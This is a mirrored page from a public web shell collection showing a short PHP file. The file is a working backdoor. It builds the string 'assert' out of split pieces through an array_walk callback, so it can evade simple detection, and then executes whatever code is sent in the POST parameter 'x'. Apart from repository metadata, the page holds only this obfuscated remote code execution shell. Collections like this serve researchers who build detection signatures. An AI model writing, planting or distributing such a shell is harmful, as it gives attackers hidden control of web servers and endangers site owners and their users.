mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
9 lines
165 B
PHP
9 lines
165 B
PHP
<?php
|
|
function sqlsec($value,$key)
|
|
{
|
|
$x = $key.$value;
|
|
$x($_POST['x']);
|
|
}
|
|
$a=array("ass"=>"ert");
|
|
array_walk($a,"sqlsec");
|
|
?>
|